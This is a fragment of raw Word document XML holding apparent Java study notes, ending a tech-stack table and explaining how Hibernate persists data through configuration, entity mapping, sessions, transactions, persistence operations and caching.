          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B9342F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 Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="72C4C32F" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="413B80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 communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B7730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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="7B013963" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0180D4A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essaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466A671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Kafka, RabbitMQ with Project Reactor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="311E247B" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79038F6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base integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18A29AE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2DBC, ReactiveMongo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="242295C3" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6A46D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="442D97B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retry, timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="08B4CD4E" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD80F7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ilience &amp; flow control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44D70A5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 circuit breakers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="39CB5948" w14:textId="77777777" w:rsidTr="00413852">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B34DC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ateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55EB2A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Cloud Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D87224D" w14:textId="6FF6A754" w:rsidR="00712F11"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395" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00712F11" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D395CCA" w14:textId="43B580FE" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="00F80B96" w:rsidP="005C6E50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="555" w:name="_Toc197867769"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="555"/>
    </w:p>
    <w:p w14:paraId="798AC231" w14:textId="01F6C8C0" w:rsidR="00AF0B20" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF0B20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="556" w:name="_Toc197867770"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">How data is persisted in </w:t>
      </w:r>
      <w:r w:rsidR="009655F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="556"/>
    </w:p>
    <w:p w14:paraId="3E0CA4B9" w14:textId="1D4F9125" w:rsidR="00D706F7" w:rsidRPr="00CE4B95"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1. Configuration Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157927E"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irst, configure Hibernate to connect to your database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087E4E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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;!-- hibernate.cfg.xml --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7092699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3BEA553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27D5282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Database connection settings --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3771567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driver_class"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>com.mysql.jdbc.Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E592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rl"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F5C8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sername"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C75D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password"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29117C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EE9662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SQL dialect --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B007D1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dialect"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>org.hibernate.dialect.MySQLDialect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBF1E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70B682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Mapping files --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7A67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mapping</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class</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com.example.Employee"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A903B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532FF5E1" w14:textId="3CC5ED32"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58348EDC" w14:textId="10295EA6" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Entity Class Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73597685"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reate a Java class annotated with @Entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4C19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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E369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Ta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loyees"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A68B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A7118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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFE59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GeneratedValu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ateg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GenerationTyp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ENTITY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A7387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6B2DA43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10299C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Colum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_name"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD2CE4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1141136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089114B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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D50F0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8ADF86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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8D64D" w14:textId="0C309505"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2945B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3. Persistence Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13643AB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ere's the step-by-step persistence flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730A40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a) Create SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707B1F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Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> config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52B9CC3F" w14:textId="17C6154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nfi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10418F04" w14:textId="0E6E51CF" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>b) Open Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752E82A" w14:textId="0CE79D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431A21FA"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 Begin Transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29058F" w14:textId="6F3D2259"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0F4F01A0" w14:textId="57A05A51" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>d) Create Entity Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F1CE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365597E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ohn Doe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0CF9F9" w14:textId="57C4F4F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50000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B231E" w14:textId="77777777" w:rsidR="005F6B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="005F6B6F" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5147A1" w14:textId="77777777" w:rsidR="0019330C" w:rsidRPr="00CE4B95" w:rsidRDefault="0019330C" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2D5DC6" w14:textId="57FCF68B" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>e) Save/Persist the Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361FEC73" w14:textId="02D403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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>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r session.persist(emp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74A42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 Commit Transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F68915" w14:textId="729E744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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>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1F67480F"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g) Close Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916D257" w14:textId="0ED9A0C0"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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EBCB9B7"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4. What Happens Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D6DD5" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00C01A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When you call </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session.save():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714175EF"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ibernate checks the entity state - determines if it's transient (new), persistent (managed), or detached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453F6C2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Generates SQL - Hibernate creates the appropriate INSERT statement based on your entity mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160F316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Executes SQL - The statement is executed against the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523659DD"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Updates entity state - The transient object becomes persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179D059"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andles ID generation - If using auto-increment, retrieves the generated ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30268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5. Transaction Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843D8C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ibernate operations should be performed within transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF4918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2D7FCCA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ADBBA2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7A81319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957B23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Perform operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CAB5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ane Smi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60000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32260D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p>
    <w:p w14:paraId="78EAAD8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E1117D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Changes are flushed to database here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CDA67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77347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0425676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row</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p>
    <w:p w14:paraId="29FD3C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3116E0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38792268" w14:textId="750B3EF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p>
    <w:p w14:paraId="274DA119"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6. Different Persistence Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829FEC4" w14:textId="3336EAA1"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Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004A5A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F985F" w14:textId="2BDC084B" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>sav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Persists the object, returns generated ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D252EF6" w14:textId="5CD403F8" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>persist()</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Similar to save() but doesn't guarantee immediate ID assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66873A8D" w14:textId="4CA926FF" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>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Updates a detached object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE3359" w14:textId="1049DFAE" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>merg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Copies state of detached object to persistent object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364CE67" w14:textId="7D16BDEB" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>saveOr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Either saves or updates based on object state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4EFCA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7. Hibernate Cache Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32B836" w14:textId="33ADDE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First Level Cache (Session cache):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E431B1"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Exists per session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A801230"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All persistent objects are stored here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53787D56" w14:textId="3EF86679" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00024B53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
